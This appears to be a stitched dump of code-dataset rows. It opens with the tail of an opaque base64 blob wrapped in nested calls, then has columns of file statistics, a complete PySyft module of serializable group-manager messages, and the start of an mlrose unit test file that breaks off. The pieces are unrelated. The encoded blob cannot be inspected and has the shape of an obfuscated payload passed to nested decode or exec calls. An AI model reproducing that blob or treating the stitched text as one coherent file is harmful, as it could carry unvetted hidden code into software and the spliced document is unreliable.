5z6Ke5hzWKQuM+BNkuD/AL/+3LX/5WCcvOLKd5FO
pYkM7UthY/2xj/b7zq23c/2rj6V/ge/8rbVPnxvpDDLhvja1+XhkH/tgHV5KXrgM1bkd+eEfPXYlnyqsly9l8vpK5WV9M4w246ztT4I+23m+JTZV4Nx6tbzx6uJPv52LK1+R7LU7VjqaaNur8yYG0gHaVlU0I2VORaCDAW/77p8ePtI2njzfu/5OXWG2AfbLDqZ/ZKr8e32txvtLBwktETjX5UDaSdtPfCL5mR4PeN89NhzsYp6br1EzBvC0HzbzGOniT7+dm0jn1723/zgvg0Um7viC3h4+K4nd3lu8fR2ccZ2Tnw+W8WOzUdmJjetlc0fOt5b5U7PR2Yu/ls+nR7VR+qdiZl2g7iuLTm8SD2Ca37nT9vcn3GW4McIfpkRvDsGfzkZAfB2G3c8M9sDmCtAfvhL8jq89g64OTopcM8CPMAPUROP3Blui2N8OcB3bBNRccifiBsSpkuuHuvermHG1kYM0DY3N+OA7CIdBF1rwowAvnS6hyPh9eZosrclGpeuoVcSsPigTJwAXOd+HitVvfEUXBtk5buS7ed9ESV/2893pRIOtGZG4F6B6BTFn9106QtQMs2gs38Q/cAM7qILkg4AMWP7E6SdWPdBvc01c5Zrr7h8Xdb6s54MCvvBC/IvEPCvwuoPcg/ueu1b/tBH8XyXVLz3qlozFT4AjoXgAxQPdxwIEtgFWUp0rA3JLtTsBYqQbqlW0Aqwj4uetFgJ+7JOD3EPD3CHg/Av7evfrvN3B4h3Q4ar0WlBYJbmORA8TqAaPw6gA9+KPb5aDnRXY56LleHLV/870k10eoJg6xu0huN1rkkM02hBYRCdqwM0HTGgnUvDyvL5y246C9O2LyMol5TnTShBPs/MaTPy9ouAue51mXdkIzfw4JTqFklC1NBEqV3WWZsKAj6aMzlGUMysIhE47FoZERfEdKq2aQvxejGcvAmMtbcL475k1eDp8zCiXM686uavObE4oFdfhC1lqppLkCMolYxgZMH8To8RwkhmV1+KMCJ/hI0SxazyxDI4xWTdj1ZSa18fQPAnt9S7Bf8U+uJD65csK2wpfr3Apd0gpFw9JuGJUiPYQIpoTFxMu+nAWbYLZkm6ogNhhhK7sSgYTQDKOHuJn6WquF/79qVgpnnRazTptnt8wyBtvYmNM70BABxxRKZWaaW701hLfIQyMjIyh8RgifMROvILwZzitM5bWnGvlx00OENH+ImxAuAi5Ho2nt26/Hv/063C/T9rJ+ZzFbLFUshJtMIvZr6EDQCIky0ynm/AII8nEwrAhgMK8vs1JezzBxYyDu4A2TITNfdEUckxHLG2nbXjiUVgol056nVEYCDGi12TxgQvEPVauchJWQ7JIJqL3OslYY/8MJKmZWjGxGzHwDZmuzCQQD2HQs01hmsKRYip++iQkrkjewXEa7mLp4pbemsmP89Q3Uf4epq1fpcA8qbmVQ6VW6lE4sg/yjKj0uN090O72yF3o6mkbsUXCEZ9Al+bta9TdJgM+urWN8XrhHAfCLi+CBxcXwbmLf+iRB/+QkFBFpSWFYTOADdRPjPVGvtHPeMErJYVnTK9ZKcgAGQDRM/kxaLY7lWTSLPX9RLzA+f91yTSkHDDlZMGglz07j/7Ov8CLQftET2BdU/N7AcMAf6PYrPgToB/PyDwCVn4ArqAR8gbZAj08RHxjn93pd9Y8nsNCh/B9lmUdh"))))
| 768.8
| 3,710
| 0.960198
| 129
| 3,844
| 28.612403
| 0.953488
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.151175
| 0.003642
| 3,844
| 5
| 3,710
| 768.8
| 0.812533
| 0.026275
| 0
| 0
| 0
| 0.5
| 0.97621
| 0.97621
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
86ab5a93676c8914c9bbe42e3bdb8eb553bc62cd
| 30,928
|
py
|
Python
|
packages/syft/src/syft/core/node/common/node_service/group_manager/group_manager_messages.py
|
maltetoelle/PySyft
|
0521f407cfdd046d00c332b733894a865848bd19
|
[
"Apache-1.1"
] | null | null | null |
packages/syft/src/syft/core/node/common/node_service/group_manager/group_manager_messages.py
|
maltetoelle/PySyft
|
0521f407cfdd046d00c332b733894a865848bd19
|
[
"Apache-1.1"
] | 3
|
2021-11-17T15:34:03.000Z
|
2021-12-08T14:39:10.000Z
|
packages/syft/src/syft/core/node/common/node_service/group_manager/group_manager_messages.py
|
maltetoelle/PySyft
|
0521f407cfdd046d00c332b733894a865848bd19
|
[
"Apache-1.1"
] | null | null | null |
# stdlib
import json
from typing import Dict
from typing import List
from typing import Optional
# third party
from google.protobuf.reflection import GeneratedProtocolMessageType
from typing_extensions import final
# relative
from ...... import serialize
from ......proto.grid.messages.group_messages_pb2 import (
CreateGroupMessage as CreateGroupMessage_PB,
)
from ......proto.grid.messages.group_messages_pb2 import (
CreateGroupResponse as CreateGroupResponse_PB,
)
from ......proto.grid.messages.group_messages_pb2 import (
DeleteGroupMessage as DeleteGroupMessage_PB,
)
from ......proto.grid.messages.group_messages_pb2 import (
DeleteGroupResponse as DeleteGroupResponse_PB,
)
from ......proto.grid.messages.group_messages_pb2 import (
GetGroupMessage as GetGroupMessage_PB,
)
from ......proto.grid.messages.group_messages_pb2 import (
GetGroupResponse as GetGroupResponse_PB,
)
from ......proto.grid.messages.group_messages_pb2 import (
GetGroupsMessage as GetGroupsMessage_PB,
)
from ......proto.grid.messages.group_messages_pb2 import (
GetGroupsResponse as GetGroupsResponse_PB,
)
from ......proto.grid.messages.group_messages_pb2 import (
UpdateGroupMessage as UpdateGroupMessage_PB,
)
from ......proto.grid.messages.group_messages_pb2 import (
UpdateGroupResponse as UpdateGroupResponse_PB,
)
from .....common.message import ImmediateSyftMessageWithReply
from .....common.message import ImmediateSyftMessageWithoutReply
from .....common.serde.deserialize import _deserialize
from .....common.serde.serializable import serializable
from .....common.uid import UID
from .....io.address import Address
@serializable()
@final
class CreateGroupMessage(ImmediateSyftMessageWithReply):
    """Syft message requesting that the receiving node create a new group."""

    def __init__(
        self,
        address: Address,
        content: Dict,
        reply_to: Address,
        msg_id: Optional[UID] = None,
    ):
        super().__init__(address=address, msg_id=msg_id, reply_to=reply_to)
        # JSON-serializable payload describing the group to be created.
        self.content = content

    def _object2proto(self) -> CreateGroupMessage_PB:
        """Returns a protobuf serialization of self.

        As a requirement of all objects which inherit from Serializable,
        this method transforms the current object into the corresponding
        Protobuf object so that it can be further serialized.

        :return: returns a protobuf object
        :rtype: CreateGroupMessage_PB

        .. note::
            This method is purely an internal method. Please use serialize(object) or one of
            the other public serialization methods if you wish to serialize an
            object.
        """
        return CreateGroupMessage_PB(
            msg_id=serialize(self.id),
            address=serialize(self.address),
            content=json.dumps(self.content),
            reply_to=serialize(self.reply_to),
        )

    @staticmethod
    def _proto2object(
        proto: CreateGroupMessage_PB,
    ) -> "CreateGroupMessage":
        """Creates a CreateGroupMessage from a protobuf.

        As a requirement of all objects which inherit from Serializable,
        this method transforms a protobuf object into an instance of this class.

        :return: returns an instance of CreateGroupMessage
        :rtype: CreateGroupMessage

        .. note::
            This method is purely an internal method. Please use syft.deserialize()
            if you wish to deserialize an object.
        """
        return CreateGroupMessage(
            msg_id=_deserialize(blob=proto.msg_id),
            address=_deserialize(blob=proto.address),
            content=json.loads(proto.content),
            reply_to=_deserialize(blob=proto.reply_to),
        )

    @staticmethod
    def get_protobuf_schema() -> GeneratedProtocolMessageType:
        """Return the type of protobuf object which stores a class of this type.

        As a part of serialization and deserialization, we need the ability to
        lookup the protobuf object type directly from the object type. This
        static method allows us to do this.

        Importantly, this method is also used to create the reverse lookup ability within
        the metaclass of Serializable.

        :return: the type of protobuf object which corresponds to this class.
        :rtype: GeneratedProtocolMessageType
        """
        return CreateGroupMessage_PB
@serializable()
@final
class CreateGroupResponse(ImmediateSyftMessageWithoutReply):
    """Response reporting the outcome of a CreateGroupMessage request."""

    def __init__(
        self,
        address: Address,
        status_code: int,
        content: Dict,
        msg_id: Optional[UID] = None,
    ):
        super().__init__(address=address, msg_id=msg_id)
        # HTTP-style status code describing the outcome of the request.
        self.status_code = status_code
        # JSON-serializable payload with the response details.
        self.content = content

    def _object2proto(self) -> CreateGroupResponse_PB:
        """Returns a protobuf serialization of self.

        As a requirement of all objects which inherit from Serializable,
        this method transforms the current object into the corresponding
        Protobuf object so that it can be further serialized.

        :return: returns a protobuf object
        :rtype: CreateGroupResponse_PB

        .. note::
            This method is purely an internal method. Please use serialize(object) or one of
            the other public serialization methods if you wish to serialize an
            object.
        """
        return CreateGroupResponse_PB(
            msg_id=serialize(self.id),
            address=serialize(self.address),
            status_code=self.status_code,
            content=json.dumps(self.content),
        )

    @staticmethod
    def _proto2object(
        proto: CreateGroupResponse_PB,
    ) -> "CreateGroupResponse":
        """Creates a CreateGroupResponse from a protobuf.

        As a requirement of all objects which inherit from Serializable,
        this method transforms a protobuf object into an instance of this class.

        :return: returns an instance of CreateGroupResponse
        :rtype: CreateGroupResponse

        .. note::
            This method is purely an internal method. Please use syft.deserialize()
            if you wish to deserialize an object.
        """
        return CreateGroupResponse(
            msg_id=_deserialize(blob=proto.msg_id),
            address=_deserialize(blob=proto.address),
            status_code=proto.status_code,
            content=json.loads(proto.content),
        )

    @staticmethod
    def get_protobuf_schema() -> GeneratedProtocolMessageType:
        """Return the type of protobuf object which stores a class of this type.

        As a part of serialization and deserialization, we need the ability to
        lookup the protobuf object type directly from the object type. This
        static method allows us to do this.

        Importantly, this method is also used to create the reverse lookup ability within
        the metaclass of Serializable.

        :return: the type of protobuf object which corresponds to this class.
        :rtype: GeneratedProtocolMessageType
        """
        return CreateGroupResponse_PB
@serializable()
@final
class GetGroupMessage(ImmediateSyftMessageWithReply):
    """Syft message requesting the details of a single group from a node."""

    def __init__(
        self,
        address: Address,
        content: Dict,
        reply_to: Address,
        msg_id: Optional[UID] = None,
    ):
        super().__init__(address=address, msg_id=msg_id, reply_to=reply_to)
        # JSON-serializable payload identifying the group to fetch.
        self.content = content

    def _object2proto(self) -> GetGroupMessage_PB:
        """Returns a protobuf serialization of self.

        As a requirement of all objects which inherit from Serializable,
        this method transforms the current object into the corresponding
        Protobuf object so that it can be further serialized.

        :return: returns a protobuf object
        :rtype: GetGroupMessage_PB

        .. note::
            This method is purely an internal method. Please use serialize(object) or one of
            the other public serialization methods if you wish to serialize an
            object.
        """
        return GetGroupMessage_PB(
            msg_id=serialize(self.id),
            address=serialize(self.address),
            content=json.dumps(self.content),
            reply_to=serialize(self.reply_to),
        )

    @staticmethod
    def _proto2object(
        proto: GetGroupMessage_PB,
    ) -> "GetGroupMessage":
        """Creates a GetGroupMessage from a protobuf.

        As a requirement of all objects which inherit from Serializable,
        this method transforms a protobuf object into an instance of this class.

        :return: returns an instance of GetGroupMessage
        :rtype: GetGroupMessage

        .. note::
            This method is purely an internal method. Please use syft.deserialize()
            if you wish to deserialize an object.
        """
        return GetGroupMessage(
            msg_id=_deserialize(blob=proto.msg_id),
            address=_deserialize(blob=proto.address),
            content=json.loads(proto.content),
            reply_to=_deserialize(blob=proto.reply_to),
        )

    @staticmethod
    def get_protobuf_schema() -> GeneratedProtocolMessageType:
        """Return the type of protobuf object which stores a class of this type.

        As a part of serialization and deserialization, we need the ability to
        lookup the protobuf object type directly from the object type. This
        static method allows us to do this.

        Importantly, this method is also used to create the reverse lookup ability within
        the metaclass of Serializable.

        :return: the type of protobuf object which corresponds to this class.
        :rtype: GeneratedProtocolMessageType
        """
        return GetGroupMessage_PB
@serializable()
@final
class GetGroupResponse(ImmediateSyftMessageWithoutReply):
    """Response carrying the details of a single group back to the requester."""

    def __init__(
        self,
        address: Address,
        status_code: int,
        content: Dict,
        msg_id: Optional[UID] = None,
    ):
        super().__init__(address=address, msg_id=msg_id)
        # HTTP-style status code describing the outcome of the request.
        self.status_code = status_code
        # JSON-serializable payload with the group details.
        self.content = content

    def _object2proto(self) -> GetGroupResponse_PB:
        """Returns a protobuf serialization of self.

        As a requirement of all objects which inherit from Serializable,
        this method transforms the current object into the corresponding
        Protobuf object so that it can be further serialized.

        :return: returns a protobuf object
        :rtype: GetGroupResponse_PB

        .. note::
            This method is purely an internal method. Please use serialize(object) or one of
            the other public serialization methods if you wish to serialize an
            object.
        """
        return GetGroupResponse_PB(
            msg_id=serialize(self.id),
            address=serialize(self.address),
            status_code=self.status_code,
            content=json.dumps(self.content),
        )

    @staticmethod
    def _proto2object(
        proto: GetGroupResponse_PB,
    ) -> "GetGroupResponse":
        """Creates a GetGroupResponse from a protobuf.

        As a requirement of all objects which inherit from Serializable,
        this method transforms a protobuf object into an instance of this class.

        :return: returns an instance of GetGroupResponse
        :rtype: GetGroupResponse

        .. note::
            This method is purely an internal method. Please use syft.deserialize()
            if you wish to deserialize an object.
        """
        return GetGroupResponse(
            msg_id=_deserialize(blob=proto.msg_id),
            address=_deserialize(blob=proto.address),
            status_code=proto.status_code,
            content=json.loads(proto.content),
        )

    @staticmethod
    def get_protobuf_schema() -> GeneratedProtocolMessageType:
        """Return the type of protobuf object which stores a class of this type.

        As a part of serialization and deserialization, we need the ability to
        lookup the protobuf object type directly from the object type. This
        static method allows us to do this.

        Importantly, this method is also used to create the reverse lookup ability within
        the metaclass of Serializable.

        :return: the type of protobuf object which corresponds to this class.
        :rtype: GeneratedProtocolMessageType
        """
        return GetGroupResponse_PB
@serializable()
@final
class GetGroupsMessage(ImmediateSyftMessageWithReply):
    """Syft message requesting the list of groups known to a node."""

    def __init__(
        self,
        address: Address,
        content: Dict,
        reply_to: Address,
        msg_id: Optional[UID] = None,
    ):
        super().__init__(address=address, msg_id=msg_id, reply_to=reply_to)
        # JSON-serializable payload with any filtering/query parameters.
        self.content = content

    def _object2proto(self) -> GetGroupsMessage_PB:
        """Returns a protobuf serialization of self.

        As a requirement of all objects which inherit from Serializable,
        this method transforms the current object into the corresponding
        Protobuf object so that it can be further serialized.

        :return: returns a protobuf object
        :rtype: GetGroupsMessage_PB

        .. note::
            This method is purely an internal method. Please use serialize(object) or one of
            the other public serialization methods if you wish to serialize an
            object.
        """
        return GetGroupsMessage_PB(
            msg_id=serialize(self.id),
            address=serialize(self.address),
            content=json.dumps(self.content),
            reply_to=serialize(self.reply_to),
        )

    @staticmethod
    def _proto2object(
        proto: GetGroupsMessage_PB,
    ) -> "GetGroupsMessage":
        """Creates a GetGroupsMessage from a protobuf.

        As a requirement of all objects which inherit from Serializable,
        this method transforms a protobuf object into an instance of this class.

        :return: returns an instance of GetGroupsMessage
        :rtype: GetGroupsMessage

        .. note::
            This method is purely an internal method. Please use syft.deserialize()
            if you wish to deserialize an object.
        """
        return GetGroupsMessage(
            msg_id=_deserialize(blob=proto.msg_id),
            address=_deserialize(blob=proto.address),
            content=json.loads(proto.content),
            reply_to=_deserialize(blob=proto.reply_to),
        )

    @staticmethod
    def get_protobuf_schema() -> GeneratedProtocolMessageType:
        """Return the type of protobuf object which stores a class of this type.

        As a part of serialization and deserialization, we need the ability to
        lookup the protobuf object type directly from the object type. This
        static method allows us to do this.

        Importantly, this method is also used to create the reverse lookup ability within
        the metaclass of Serializable.

        :return: the type of protobuf object which corresponds to this class.
        :rtype: GeneratedProtocolMessageType
        """
        return GetGroupsMessage_PB
@serializable()
@final
class GetGroupsResponse(ImmediateSyftMessageWithoutReply):
    """Response carrying the list of groups back to the requester."""

    def __init__(
        self,
        address: Address,
        status_code: int,
        content: List,
        msg_id: Optional[UID] = None,
    ):
        super().__init__(address=address, msg_id=msg_id)
        # HTTP-style status code describing the outcome of the request.
        self.status_code = status_code
        # JSON-serializable list of group records.
        self.content = content

    def _object2proto(self) -> GetGroupsResponse_PB:
        """Returns a protobuf serialization of self.

        As a requirement of all objects which inherit from Serializable,
        this method transforms the current object into the corresponding
        Protobuf object so that it can be further serialized.

        :return: returns a protobuf object
        :rtype: GetGroupsResponse_PB

        .. note::
            This method is purely an internal method. Please use serialize(object) or one of
            the other public serialization methods if you wish to serialize an
            object.
        """
        return GetGroupsResponse_PB(
            msg_id=serialize(self.id),
            address=serialize(self.address),
            status_code=self.status_code,
            content=json.dumps(self.content),
        )

    @staticmethod
    def _proto2object(
        proto: GetGroupsResponse_PB,
    ) -> "GetGroupsResponse":
        """Creates a GetGroupsResponse from a protobuf.

        As a requirement of all objects which inherit from Serializable,
        this method transforms a protobuf object into an instance of this class.

        :return: returns an instance of GetGroupsResponse
        :rtype: GetGroupsResponse

        .. note::
            This method is purely an internal method. Please use syft.deserialize()
            if you wish to deserialize an object.
        """
        return GetGroupsResponse(
            msg_id=_deserialize(blob=proto.msg_id),
            address=_deserialize(blob=proto.address),
            status_code=proto.status_code,
            content=json.loads(proto.content),
        )

    @staticmethod
    def get_protobuf_schema() -> GeneratedProtocolMessageType:
        """Return the type of protobuf object which stores a class of this type.

        As a part of serialization and deserialization, we need the ability to
        lookup the protobuf object type directly from the object type. This
        static method allows us to do this.

        Importantly, this method is also used to create the reverse lookup ability within
        the metaclass of Serializable.

        :return: the type of protobuf object which corresponds to this class.
        :rtype: GeneratedProtocolMessageType
        """
        return GetGroupsResponse_PB
@serializable()
@final
class UpdateGroupMessage(ImmediateSyftMessageWithReply):
    """Request asking a node to update a group; a reply is expected.

    Attributes:
        content: JSON-serializable dict describing the group update.
    """

    def __init__(
        self,
        address: Address,
        content: Dict,
        reply_to: Address,
        msg_id: Optional[UID] = None,
    ):
        super().__init__(address=address, msg_id=msg_id, reply_to=reply_to)
        self.content = content

    def _object2proto(self) -> UpdateGroupMessage_PB:
        """Serialize this request into its protobuf counterpart.

        .. note::
            Internal helper — use serialize(object) or another public
            serialization entry point instead.

        :return: the protobuf representation of this request
        :rtype: UpdateGroupMessage_PB
        """
        # The dict payload travels as a JSON string inside the proto.
        encoded_content = json.dumps(self.content)
        return UpdateGroupMessage_PB(
            msg_id=serialize(self.id),
            address=serialize(self.address),
            content=encoded_content,
            reply_to=serialize(self.reply_to),
        )

    @staticmethod
    def _proto2object(
        proto: UpdateGroupMessage_PB,
    ) -> "UpdateGroupMessage":
        """Rebuild an UpdateGroupMessage from its protobuf form.

        .. note::
            Internal helper — use syft.deserialize() instead.

        :return: the reconstructed request message
        :rtype: UpdateGroupMessage
        """
        return UpdateGroupMessage(
            msg_id=_deserialize(blob=proto.msg_id),
            address=_deserialize(blob=proto.address),
            content=json.loads(proto.content),
            reply_to=_deserialize(blob=proto.reply_to),
        )

    @staticmethod
    def get_protobuf_schema() -> GeneratedProtocolMessageType:
        """Return the protobuf class that backs this message type.

        The Serializable metaclass also calls this to register the reverse
        (proto type -> message class) lookup.

        :return: the protobuf message class
        :rtype: GeneratedProtocolMessageType
        """
        return UpdateGroupMessage_PB
@serializable()
@final
class UpdateGroupResponse(ImmediateSyftMessageWithoutReply):
    """Response message reporting the outcome of a group update.

    Attributes:
        status_code: HTTP-style status of the update operation.
        content: JSON-serializable dict payload with operation details.
    """

    def __init__(
        self,
        address: Address,
        status_code: int,
        content: Dict,
        msg_id: Optional[UID] = None,
    ):
        super().__init__(address=address, msg_id=msg_id)
        self.status_code = status_code
        self.content = content

    def _object2proto(self) -> UpdateGroupResponse_PB:
        """Serialize this response into its protobuf counterpart.

        .. note::
            Internal helper — use serialize(object) or another public
            serialization entry point instead.

        :return: the protobuf representation of this response
        :rtype: UpdateGroupResponse_PB
        """
        # The dict payload travels as a JSON string inside the proto.
        encoded_content = json.dumps(self.content)
        return UpdateGroupResponse_PB(
            msg_id=serialize(self.id),
            address=serialize(self.address),
            status_code=self.status_code,
            content=encoded_content,
        )

    @staticmethod
    def _proto2object(
        proto: UpdateGroupResponse_PB,
    ) -> "UpdateGroupResponse":
        """Rebuild an UpdateGroupResponse from its protobuf form.

        .. note::
            Internal helper — use syft.deserialize() instead.

        :return: the reconstructed response message
        :rtype: UpdateGroupResponse
        """
        return UpdateGroupResponse(
            msg_id=_deserialize(blob=proto.msg_id),
            address=_deserialize(blob=proto.address),
            status_code=proto.status_code,
            content=json.loads(proto.content),
        )

    @staticmethod
    def get_protobuf_schema() -> GeneratedProtocolMessageType:
        """Return the protobuf class that backs this message type.

        The Serializable metaclass also calls this to register the reverse
        (proto type -> message class) lookup.

        :return: the protobuf message class
        :rtype: GeneratedProtocolMessageType
        """
        return UpdateGroupResponse_PB
@serializable()
@final
class DeleteGroupMessage(ImmediateSyftMessageWithReply):
    """Request asking a node to delete a group; a reply is expected.

    Attributes:
        content: JSON-serializable dict identifying the group to delete.
    """

    def __init__(
        self,
        address: Address,
        content: Dict,
        reply_to: Address,
        msg_id: Optional[UID] = None,
    ):
        super().__init__(address=address, msg_id=msg_id, reply_to=reply_to)
        self.content = content

    def _object2proto(self) -> DeleteGroupMessage_PB:
        """Serialize this request into its protobuf counterpart.

        .. note::
            Internal helper — use serialize(object) or another public
            serialization entry point instead.

        :return: the protobuf representation of this request
        :rtype: DeleteGroupMessage_PB
        """
        # The dict payload travels as a JSON string inside the proto.
        encoded_content = json.dumps(self.content)
        return DeleteGroupMessage_PB(
            msg_id=serialize(self.id),
            address=serialize(self.address),
            content=encoded_content,
            reply_to=serialize(self.reply_to),
        )

    @staticmethod
    def _proto2object(
        proto: DeleteGroupMessage_PB,
    ) -> "DeleteGroupMessage":
        """Rebuild a DeleteGroupMessage from its protobuf form.

        .. note::
            Internal helper — use syft.deserialize() instead.

        :return: the reconstructed request message
        :rtype: DeleteGroupMessage
        """
        return DeleteGroupMessage(
            msg_id=_deserialize(blob=proto.msg_id),
            address=_deserialize(blob=proto.address),
            content=json.loads(proto.content),
            reply_to=_deserialize(blob=proto.reply_to),
        )

    @staticmethod
    def get_protobuf_schema() -> GeneratedProtocolMessageType:
        """Return the protobuf class that backs this message type.

        The Serializable metaclass also calls this to register the reverse
        (proto type -> message class) lookup.

        :return: the protobuf message class
        :rtype: GeneratedProtocolMessageType
        """
        return DeleteGroupMessage_PB
@serializable()
@final
class DeleteGroupResponse(ImmediateSyftMessageWithoutReply):
    """Response message reporting the outcome of a group deletion.

    Attributes:
        status_code: HTTP-style status of the delete operation.
        content: JSON-serializable dict payload with operation details.
    """

    def __init__(
        self,
        address: Address,
        status_code: int,
        content: Dict,
        msg_id: Optional[UID] = None,
    ):
        super().__init__(address=address, msg_id=msg_id)
        self.status_code = status_code
        self.content = content

    def _object2proto(self) -> DeleteGroupResponse_PB:
        """Serialize this response into its protobuf counterpart.

        .. note::
            Internal helper — use serialize(object) or another public
            serialization entry point instead.

        :return: the protobuf representation of this response
        :rtype: DeleteGroupResponse_PB
        """
        # The dict payload travels as a JSON string inside the proto.
        encoded_content = json.dumps(self.content)
        return DeleteGroupResponse_PB(
            msg_id=serialize(self.id),
            address=serialize(self.address),
            status_code=self.status_code,
            content=encoded_content,
        )

    @staticmethod
    def _proto2object(
        proto: DeleteGroupResponse_PB,
    ) -> "DeleteGroupResponse":
        """Rebuild a DeleteGroupResponse from its protobuf form.

        .. note::
            Internal helper — use syft.deserialize() instead.

        :return: the reconstructed response message
        :rtype: DeleteGroupResponse
        """
        return DeleteGroupResponse(
            msg_id=_deserialize(blob=proto.msg_id),
            address=_deserialize(blob=proto.address),
            status_code=proto.status_code,
            content=json.loads(proto.content),
        )

    @staticmethod
    def get_protobuf_schema() -> GeneratedProtocolMessageType:
        """Return the protobuf class that backs this message type.

        The Serializable metaclass also calls this to register the reverse
        (proto type -> message class) lookup.

        :return: the protobuf message class
        :rtype: GeneratedProtocolMessageType
        """
        return DeleteGroupResponse_PB
| 40.481675
| 92
| 0.672691
| 3,584
| 30,928
| 5.705357
| 0.041295
| 0.034233
| 0.017606
| 0.015649
| 0.872408
| 0.872408
| 0.872408
| 0.872408
| 0.870305
| 0.850499
| 0
| 0.001327
| 0.269303
| 30,928
| 763
| 93
| 40.534731
| 0.903491
| 0.500129
| 0
| 0.663043
| 1
| 0
| 0.013506
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.108696
| false
| 0
| 0.0625
| 0
| 0.279891
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
86beca144c140da8f6f25005bcd608c13261fa37
| 28,310
|
py
|
Python
|
tests/test_opt_probs.py
|
sareini/mlrose
|
b5ebaac322cb063ad4611367c43e1827bda0eb95
|
[
"BSD-3-Clause"
] | 63
|
2019-09-24T14:09:51.000Z
|
2022-03-09T02:36:25.000Z
|
tests/test_opt_probs.py
|
sareini/mlrose
|
b5ebaac322cb063ad4611367c43e1827bda0eb95
|
[
"BSD-3-Clause"
] | 6
|
2019-10-04T01:04:21.000Z
|
2021-08-31T19:06:13.000Z
|
tests/test_opt_probs.py
|
sareini/mlrose
|
b5ebaac322cb063ad4611367c43e1827bda0eb95
|
[
"BSD-3-Clause"
] | 104
|
2019-09-23T22:44:43.000Z
|
2022-03-13T18:50:53.000Z
|
""" Unit tests for opt_probs.py"""
# Author: Genevieve Hayes
# License: BSD 3 clause
# Prefer an installed mlrose_hiive; fall back to the repo checkout one
# directory up so the tests also run from a source tree.
try:
    import mlrose_hiive
except ImportError:  # narrow catch: a bare `except:` would hide real errors
    import sys
    sys.path.append("..")
import unittest
import numpy as np
from mlrose_hiive import OneMax, DiscreteOpt, ContinuousOpt, TSPOpt, OnePointCrossOver
# The following functions/classes are not automatically imported at
# initialization, so must be imported explicitly from neural.py,
# activation.py and opt_probs.py
from mlrose_hiive.neural import NetworkWeights
from mlrose_hiive.neural.activation import identity
from mlrose_hiive.opt_probs._opt_prob import _OptProb as OptProb
class TestOptProb(unittest.TestCase):
    """Tests for _OptProb class."""
    @staticmethod
    def test_set_state_max():
        """Test set_state method for a maximization problem"""
        problem = OptProb(5, OneMax(), maximize=True)
        x = np.array([0, 1, 2, 3, 4])
        problem.set_state(x)
        # OneMax fitness is the element sum: 0+1+2+3+4 == 10.
        assert (np.array_equal(problem.get_state(), x)
                and problem.get_fitness() == 10)
    @staticmethod
    def test_set_state_min():
        """Test set_state method for a minimization problem"""
        problem = OptProb(5, OneMax(), maximize=False)
        x = np.array([0, 1, 2, 3, 4])
        problem.set_state(x)
        # Minimization negates the stored fitness, hence -10.
        assert (np.array_equal(problem.get_state(), x)
                and problem.get_fitness() == -10)
    @staticmethod
    def test_set_population_max():
        """Test set_population method for a maximization problem"""
        problem = OptProb(5, OneMax(), maximize=True)
        pop = np.array([[0, 0, 0, 0, 1],
                        [1, 0, 1, 0, 1],
                        [1, 1, 1, 1, 0],
                        [1, 0, 0, 0, 1],
                        [100, 0, 0, 0, 0],
                        [0, 0, 0, 0, 0],
                        [1, 1, 1, 1, 1],
                        [0, 0, 0, 0, -50]])
        # pop_fit holds the OneMax (row-sum) fitness of each member.
        pop_fit = np.array([1, 3, 4, 2, 100, 0, 5, -50])
        problem.set_population(pop)
        assert (np.array_equal(problem.get_population(), pop)
                and np.array_equal(problem.get_pop_fitness(), pop_fit))
    @staticmethod
    def test_set_population_min():
        """Test set_population method for a minimization problem"""
        problem = OptProb(5, OneMax(), maximize=False)
        pop = np.array([[0, 0, 0, 0, 1],
                        [1, 0, 1, 0, 1],
                        [1, 1, 1, 1, 0],
                        [1, 0, 0, 0, 1],
                        [100, 0, 0, 0, 0],
                        [0, 0, 0, 0, 0],
                        [1, 1, 1, 1, 1],
                        [0, 0, 0, 0, -50]])
        # Same row sums as the maximization case, negated for minimization.
        pop_fit = -1.0*np.array([1, 3, 4, 2, 100, 0, 5, -50])
        problem.set_population(pop)
        assert (np.array_equal(problem.get_population(), pop)
                and np.array_equal(problem.get_pop_fitness(), pop_fit))
    @staticmethod
    def test_best_child_max():
        """Test best_child method for a maximization problem"""
        problem = OptProb(5, OneMax(), maximize=True)
        pop = np.array([[0, 0, 0, 0, 1],
                        [1, 0, 1, 0, 1],
                        [1, 1, 1, 1, 0],
                        [1, 0, 0, 0, 1],
                        [100, 0, 0, 0, 0],
                        [0, 0, 0, 0, 0],
                        [1, 1, 1, 1, 1],
                        [0, 0, 0, 0, -50]])
        problem.set_population(pop)
        x = problem.best_child()
        # Row [100, 0, 0, 0, 0] has the highest sum (100).
        assert np.array_equal(x, np.array([100, 0, 0, 0, 0]))
    @staticmethod
    def test_best_child_min():
        """Test best_child method for a minimization problem"""
        problem = OptProb(5, OneMax(), maximize=False)
        pop = np.array([[0, 0, 0, 0, 1],
                        [1, 0, 1, 0, 1],
                        [1, 1, 1, 1, 0],
                        [1, 0, 0, 0, 1],
                        [100, 0, 0, 0, 0],
                        [0, 0, 0, 0, 0],
                        [1, 1, 1, 1, 1],
                        [0, 0, 0, 0, -50]])
        problem.set_population(pop)
        x = problem.best_child()
        # Row [0, 0, 0, 0, -50] has the lowest sum (-50).
        assert np.array_equal(x, np.array([0, 0, 0, 0, -50]))
    @staticmethod
    def test_best_neighbor_max():
        """Test best_neighbor method for a maximization problem"""
        problem = OptProb(5, OneMax(), maximize=True)
        pop = np.array([[0, 0, 0, 0, 1],
                        [1, 0, 1, 0, 1],
                        [1, 1, 1, 1, 0],
                        [1, 0, 0, 0, 1],
                        [100, 0, 0, 0, 0],
                        [0, 0, 0, 0, 0],
                        [1, 1, 1, 1, 1],
                        [0, 0, 0, 0, -50]])
        # Neighbors are assigned directly rather than via find_neighbors().
        problem.neighbors = pop
        x = problem.best_neighbor()
        assert np.array_equal(x, np.array([100, 0, 0, 0, 0]))
